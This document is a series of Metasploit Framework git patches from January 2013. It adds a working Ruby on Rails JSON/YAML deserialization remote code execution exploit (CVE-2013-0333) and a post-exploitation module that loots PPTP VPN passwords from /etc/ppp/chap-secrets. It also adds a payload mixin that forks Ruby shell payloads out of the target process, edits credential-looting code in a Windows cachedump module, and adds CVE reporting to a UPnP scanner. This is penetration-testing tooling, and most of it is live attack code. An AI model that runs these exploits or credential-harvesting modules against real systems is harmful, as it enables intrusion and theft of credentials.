8ac65d6a0f6d..4d4fd787a602 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -536,15 +536,21 @@ def target_uri end # - # Make sure the URI starts with a slash and doesn't end with one + # Returns a modified version of the URI that: + # 1. Always has a starting slash + # 2. Removes all the double slashes + # 3. Removes the trailing slash # def normalize_uri(str) - + # Makes sure there's a starting slash unless str.to_s[0,1] == "/" str = "/" + str.to_s end - str = str.gsub(/^\/+/, '/') + # Removes all double slashes + str = str.gsub!("//", "/") while str.index("//") + + # Makes sure there's no trailing slash unless str.length == 1 str = str.gsub(/\/+$/, '') end From 690ef85ac1120a2a8e0845fe03c3c5398802b813 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 13:19:31 -0600 Subject: [PATCH 179/421] Fix trailing slash problem These modules require the target URI to be a directory path. So if you remove the trailing slash, the web server might return a 301 or 404 instead of 200. Related to: [SeeRM: #7727] --- .../admin/cisco/cisco_secure_acs_bypass.rb | 1 + .../gather/wp_w3_total_cache_hash_extract.rb | 15 ++++++++++++--- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 1 + modules/exploits/linux/http/vcms_upload.rb | 1 + .../windows/mysql/scrutinizer_upload_exec.rb | 1 + 7 files changed, 18 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 4ddf66ff529a..58aae1ae9841 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -75,6 +75,7 @@ def run_host(ip) begin uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 564218eaa1d7..db04a3a2f8fe 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -55,9 +55,17 @@ def wordpress_url # Call the User site, so the db statement will be cached def cache_user_info(user_id) - user_url = normalize_uri("/#{wordpress_url}?author=#{user_id}") + user_url = normalize_uri(wordpress_url) begin - send_request_cgi({ "uri" => user_url, "method" => "GET" }) + send_request_cgi( + { + "uri" => user_url, + "method" => "GET", + "vars_get" => { + "author" => user_id + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout vprint_error("Unable to connect to #{url}") return nil @@ -83,7 +91,8 @@ def run_host(ip) key="w3tc_#{host}_#{site_id}_sql_#{query_md5}" key_md5 = ::Rex::Text.md5(key) hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}" - url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache#{hash_path}") + url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache") + uri << hash_path result = nil begin diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index 7f698f9bff79..c7c18d50e771 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -218,7 +218,7 @@ def run_host(ip) #Get GlassFish version edition, version, banner = get_version(res) - path = normalize_uri(datastore['PATH']) + path = normalize_uri(target_uri) target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}" print_status("#{target_url} - GlassFish - Attempting authentication") diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 740a9121608f..7afdc7e61d1d 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -89,7 +89,7 @@ def do_login(user, pass) return :skip_user when /Invalid password/ vprint_status("#{@peer} - Username found: #{user}") - else /\<a href="process.php\?logout=1"\>/ + else /\<a href="process\.php\?logout=1"\>/ print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"") report_auth_info({ :host => rhost, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index a2547640a1c2..abf9fb3f4692 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -61,6 +61,7 @@ def initialize(info={}) def check uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri' => uri diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index c04ea190f5ce..d5f5fc8acd53 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -63,6 +63,7 @@ def initialize(info={}) def check uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_raw({ 'uri' => uri, 'method' => 'GET' diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index dfc48fc27d3b..641783f5a31d 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -73,6 +73,7 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] uri = normalize_uri(target_uri.host) + uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] res = send_request_raw({'uri'=>uri}) datastore['RPORT'] = tmp_rport From 1ea1ad3166de0c8c0fc888fd3cac53c6946620d6 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 14:48:22 -0600 Subject: [PATCH 180/421] Fix the forgotten path() --- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index c7c18d50e771..a48c352431b6 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -98,7 +98,7 @@ def send_request(path, method, session='', data=nil, ctype=nil) headers['Content-Type'] = ctype if ctype != nil headers['Content-Length'] = data.length if data != nil - uri = normalize_uri(target_uri) + uri = normalize_uri(target_uri.path) res = send_request_raw({ 'uri' => "#{uri}#{path}", 'method' => method, From ca70041f32158a9af8e2981d8b698154f50a09bf Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 16:23:26 -0600 Subject: [PATCH 181/421] Adds a post module that loots chap-secrets --- .../post/linux/gather/pptpd_chap_secrets.rb | 120 ++++++++++++++++++ 1 file changed, 120 insertions(+) create mode 100644 modules/post/linux/gather/pptpd_chap_secrets.rb diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb new file mode 100644 index 000000000000..1972b0cba873 --- /dev/null +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -0,0 +1,120 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/post/common' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Linux Gather PPTP VPN chap-secrets Credentials', + 'Description' => %q{ + This module collects PPTP VPN information such as client, server, password, + and IP from your target server's chap-secrets file. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'linux' ], + 'SessionTypes' => [ "shell", "meterpreter" ] + )) + + register_options( + [ + OptString.new('FILE', [true, 'The default path for chap-secrets', '/etc/ppp/chap-secrets']) + ], self.class) + end + + + # + # Reads chap_secrets + # + def load_file(fname) + begin + data = cmd_exec("cat #{fname}") + rescue RequestError => e + print_error("Failed to retrieve file. #{e.message}") + data = '' + end + + if data =~ /^#{fname}: regular file, no read permission$/ or data =~ /Permission denied$/ + return :access_denied + elsif data =~ /\(No such file or directory\)$/ + return :not_found + elsif data.empty? + return :empty + end + + return data + end + + + # + # Extracts client, server, secret, and IP addresses + # + def extract_secrets(data) + tbl = Rex::Ui::Text::Table.new({ + 'Header' => 'PPTPd chap-secrets', + 'Indent' => 1, + 'Columns' => ['Client', 'Server', 'Secret', 'IP'] + }) + + data.each_line do |l| + # If this line is commented out, ignore it + next if l =~ /^[[:blank:]]*#/ + + found = l.scan(/(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)$/).flatten + + # Nothing is found, skip! + next if found.empty? + + client = (found[0] || '').strip + server = (found[1] || '').strip + secret = (found[2] || '').strip + ip = (found[3] || '').strip + + tbl << [client, server, secret, ip] + end + + if tbl.rows.empty? + print_status("This file has no secrets: #{datastore['FILE']}") + else + print_line(tbl.to_s) + + p = store_loot( + 'linux.chapsecrets.creds', + 'text/csv', + session, + tbl.to_csv, + File.basename(datastore['FILE'] + ".txt") + ) + print_good("Secrets stored in: #{p}") + end + end + + + def run + fname = datastore['FILE'] + f = load_file(fname) + + case f + when :access_denied + print_error("No permission to read: #{fname}") + when :not_found + print_error("Not found: #{fname}") + when :empty + print_status("File is actually empty: #{fname}") + else + extract_secrets(f) + end + end + +end \ No newline at end of file From ee2579607ab89fd83eb8536aa08156944f043c6e Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:05:14 -0600 Subject: [PATCH 182/421] Working against 3.0.19 --- .../multi/http/rails_json_yaml_code_exec.rb | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 modules/exploits/multi/http/rails_json_yaml_code_exec.rb diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb new file mode 100644 index 000000000000..4bd4765e4e93 --- /dev/null +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'yaml' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStagerTFTP + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the JSON request + processor of the Ruby on Rails application framework. This vulnerability allows + an attacker to instantiate a remote object, which in turn can be used to execute + any ruby code remotely in the context of the application. + + This module has been tested on RoR 3.0.19 + + The technique used by this module requires the target to be running a fairly recent + version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be + exploitable using the init_with() method, but this has not been demonstrated. + + }, + 'Author' => + [ + 'charliesome', # PoC + 'espes', # PoC and Metasploit module + 'lian', # Identified the RouteSet::NamedRouteCollection vector + 'hdm' # Module merge/conversion/payload work + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-0333'], + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => false, + 'Targets' => [ ['Automatic', {} ] ], + 'DisclosureDate' => 'Jan 28 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), + OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) + + ], self.class) + + end + + # + # Create the YAML document that will be embedded into the JSON + # + def build_yaml_rails2 + + code = Rex::Text.encode_base64(payload.encoded) + yaml = + "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + + "eval(%[#{code}].unpack(%[m0])[0]);' " + + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" + yaml.gsub(':', '\u003a') + end + + + # + # Create the YAML document that will be embedded into the JSON + # + def build_yaml_rails3 + + code = Rex::Text.encode_base64(payload.encoded) + yaml = + "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + + "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " + + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" + yaml.gsub(':', '\u003a') + end + + + # + # Send the actual request + # + def exploit + + print_status("Sending Railsv3 request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', + 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_yaml_rails3 + }, 25) + handler + + end +end From 92c736a6a944fed8738850672f87d3b1b29a19c1 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:34:39 -0600 Subject: [PATCH 183/421] Move fork stuff out of exploit into payload mixin Tested xml against 3.2.10 and json against 3.0.19 --- lib/msf/core/payload/ruby.rb | 39 ++++++++++++ .../multi/http/rails_json_yaml_code_exec.rb | 3 +- .../multi/http/rails_xml_yaml_code_exec.rb | 60 +++++-------------- .../payloads/singles/ruby/shell_bind_tcp.rb | 4 +- .../singles/ruby/shell_bind_tcp_ipv6.rb | 4 +- .../singles/ruby/shell_reverse_tcp.rb | 4 +- 6 files changed, 65 insertions(+), 49 deletions(-) create mode 100644 lib/msf/core/payload/ruby.rb diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb new file mode 100644 index 000000000000..46980e348c34 --- /dev/null +++ b/lib/msf/core/payload/ruby.rb @@ -0,0 +1,39 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf::Payload::Ruby + + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + # Since space restrictions aren't really a problem, default this to + # true. + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + ] + ) + end + + def prepends(buf) + if datastore['PrependFork'] + buf = %Q^ + code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first + if RUBY_PLATFORM =~ /mswin|mingw|win32/ + inp = IO.popen(%(ruby), %(wb)) rescue nil + if inp + inp.write(code) + inp.close + end + else + if ! Process.fork() + eval(code) rescue nil + end + end + ^.strip.split(/\n/).map{|line| line.strip}.join("\n") + end + + buf + end + +end diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4bd4765e4e93..018f5dbf532c 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -47,6 +47,7 @@ def initialize(info = {}) 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 28 2013', + 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( @@ -94,6 +95,7 @@ def build_yaml_rails3 # Send the actual request # def exploit + p payload.encoded print_status("Sending Railsv3 request to #{rhost}:#{rport}...") send_request_cgi({ @@ -103,7 +105,6 @@ def exploit 'headers' => { 'X-HTTP-Method-Override' => 'get' }, 'data' => build_yaml_rails3 }, 25) - handler end end diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index b103422ff400..0d02e885fdc8 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -47,6 +47,7 @@ def initialize(info = {}) 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', + 'DefaultOptions' => { "PrependFork" => true }, 'DefaultTarget' => 0)) register_options( @@ -63,35 +64,12 @@ def initialize(info = {}) ], self.class) end - - # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout - # - def detached_payload_stub(code) - %Q^ - code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first - if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp - inp.write(code) - inp.close - end - else - if ! Process.fork() - eval(code) rescue nil - end - end - ^.strip.split(/\n/).map{|line| line.strip}.join("\n") - end - # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 - # Embed the payload with the detached stub - code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) + code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + @@ -108,8 +86,7 @@ def build_yaml_rails2 # def build_yaml_rails3 - # Embed the payload with the detached stub - code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) + code = Rex::Text.encode_base64(payload.encoded) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + @@ -164,24 +141,17 @@ def build_request(v) # def exploit - print_status("Sending Railsv3 request to #{rhost}:#{rport}...") - res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/xml', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_request(3) - }, 25) - handler - - print_status("Sending Railsv2 request to #{rhost}:#{rport}...") - res = send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/xml', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_request(2) - }, 25) - handler + [2, 3].each do |ver| + print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/xml', + 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_request(ver) + }, 25) + handler + end + end end diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb index c7ccfff7b985..8a095ec25f89 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb index 2e3926ca37af..e0860b0074a7 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index 0e149754cf5d..0bffe8832228 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/payload/ruby' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' @@ -13,6 +14,7 @@ module Metasploit3 include Msf::Payload::Single + include Msf::Payload::Ruby include Msf::Sessions::CommandShellOptions def initialize(info = {}) @@ -31,7 +33,7 @@ def initialize(info = {}) end def generate - return super + ruby_string + return prepends(ruby_string) end def ruby_string From c0757ce9053528b9effc118cf7b5d7c9ef011d1c Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 21:41:15 -0600 Subject: [PATCH 184/421] Add support for 2.x --- .../multi/http/rails_json_yaml_code_exec.rb | 25 +++++++++++++------ 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 018f5dbf532c..1343d04a615a 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -90,6 +90,12 @@ def build_yaml_rails3 yaml.gsub(':', '\u003a') end + def build_request(v) + case v + when 2; build_yaml_rails2 + when 3; build_yaml_rails3 + end + end # # Send the actual request @@ -97,14 +103,17 @@ def build_yaml_rails3 def exploit p payload.encoded - print_status("Sending Railsv3 request to #{rhost}:#{rport}...") - send_request_cgi({ - 'uri' => normalize_uri(target_uri.path), - 'method' => datastore['HTTP_METHOD'], - 'ctype' => 'application/json', - 'headers' => { 'X-HTTP-Method-Override' => 'get' }, - 'data' => build_yaml_rails3 - }, 25) + [2, 3].each do |ver| + print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") + send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => datastore['HTTP_METHOD'], + 'ctype' => 'application/json', + 'headers' => { 'X-HTTP-Method-Override' => 'get' }, + 'data' => build_request(ver) + }, 25) + handler + end end end From dc199685556ea5066af47bc39ec46b9ecf1ec1be Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 22:21:03 -0600 Subject: [PATCH 185/421] Minor cleanups --- .../multi/http/rails_json_yaml_code_exec.rb | 30 ++++++++++--------- 1 file changed, 16 insertions(+), 14 deletions(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 1343d04a615a..b1c25b2b3d5c 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -6,7 +6,6 @@ ## require 'msf/core' -require 'yaml' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,24 +17,27 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails JSON Processor YAML Deserialization Code Execution', 'Description' => %q{ - This module exploits a remote code execution vulnerability in the JSON request - processor of the Ruby on Rails application framework. This vulnerability allows - an attacker to instantiate a remote object, which in turn can be used to execute - any ruby code remotely in the context of the application. + This module exploits a remote code execution vulnerability in the + JSON request processor of the Ruby on Rails application framework. + This vulnerability allows an attacker to instantiate a remote object, + which in turn can be used to execute any ruby code remotely in the + context of the application. This vulnerability is very similar to + CVE-2013-0156 - This module has been tested on RoR 3.0.19 + This module has been tested successfully on RoR 3.0.9, 3.0.19, and + 2.3.15. - The technique used by this module requires the target to be running a fairly recent - version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be - exploitable using the init_with() method, but this has not been demonstrated. + The technique used by this module requires the target to be running a + fairly recent version of Ruby 1.9 (since 2011 or so). Applications + using Ruby 1.8 may still be exploitable using the init_with() method, + but this has not been demonstrated. }, 'Author' => [ - 'charliesome', # PoC - 'espes', # PoC and Metasploit module - 'lian', # Identified the RouteSet::NamedRouteCollection vector - 'hdm' # Module merge/conversion/payload work + 'jjarmoc', # Initial module based on cve-2013-0156, testing help + 'egypt', # Module + 'lian', # Identified the RouteSet::NamedRouteCollection vector ], 'License' => MSF_LICENSE, 'References' => @@ -106,7 +108,7 @@ def exploit [2, 3].each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") send_request_cgi({ - 'uri' => datastore['URIPATH'] || "/", + 'uri' => normalize_uri(target_uri.path), 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/json', 'headers' => { 'X-HTTP-Method-Override' => 'get' }, From 464d048eca30bfeff8af42d5bc20baeb0cbc4030 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 22:25:57 -0600 Subject: [PATCH 186/421] Remove debugging print --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index b1c25b2b3d5c..4f31cb38f5d9 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -103,7 +103,6 @@ def build_request(v) # Send the actual request # def exploit - p payload.encoded [2, 3].each do |ver| print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...") From da5436e565363af9c6387bb159f6a994d20173b0 Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Mon, 28 Jan 2013 23:29:50 -0500 Subject: [PATCH 187/421] Made changes as described in Redmine issue 7605 --- modules/post/windows/gather/cachedump.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index dddf43ab7e71..a6299a173be4 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -516,9 +516,6 @@ def run end end - store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, - "mscache_credentials.txt", "MSCACHE Credentials") - print_status("John the Ripper format:") john.split("\n").each do |pass| @@ -527,8 +524,11 @@ def run if( @vista == 1 ) print_status("Hash are in MSCACHE_VISTA format. (mscash2)") + store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + else print_status("Hash are in MSCACHE format. (mscash)") + store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") end rescue ::Interrupt From 38785015e1386d90484f98265f8f95642ab0d9ce Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Mon, 28 Jan 2013 23:08:53 -0600 Subject: [PATCH 188/421] Missing period in description --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 4f31cb38f5d9..efa29002c81e 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -22,7 +22,7 @@ def initialize(info = {}) This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to - CVE-2013-0156 + CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. From 358f7cc62f7efb46c9befc0fbf231fb7ab7c3906 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Tue, 29 Jan 2013 00:15:39 -0600 Subject: [PATCH 189/421] Adds CVE reporting to the UPnP scanner --- .../auxiliary/scanner/upnp/ssdp_msearch.rb | 50 ++++++++++++++++++- 1 file changed, 49 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index aeb199f7339e..23297bf0cdb1 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -60,9 +60,57 @@ def scanner_postscan(batch) desc = bits.join(" | ") sinfo[:info] = desc - print_status("#{skey} SSDP #{desc}") + res[:vulns] = [] + + if res[:info][:server].to_s =~ /MiniUPnPd\/1\.0([\.\,\-\~\s]|$)/mi + res[:vulns] << { + :name => "MiniUPnPd ProcessSSDPRequest() Out of Bounds Memory Access Denial of Service", + :refs => [ 'CVE-2013-0229' ] + } + end + + if res[:info][:server].to_s =~ /MiniUPnPd\/1\.[0-3]([\.\,\-\~\s]|$)/mi + res[:vulns] << { + :name => "MiniUPnPd ExecuteSoapAction memcpy() Remote Code Execution", + :refs => [ 'CVE-2013-0230' ], + :port => res[:info][:ssdp_port] || 80, + :proto => 'tcp' + } + end + + if res[:info][:server].to_s =~ /Intel SDK for UPnP devices.*|Portable SDK for UPnP 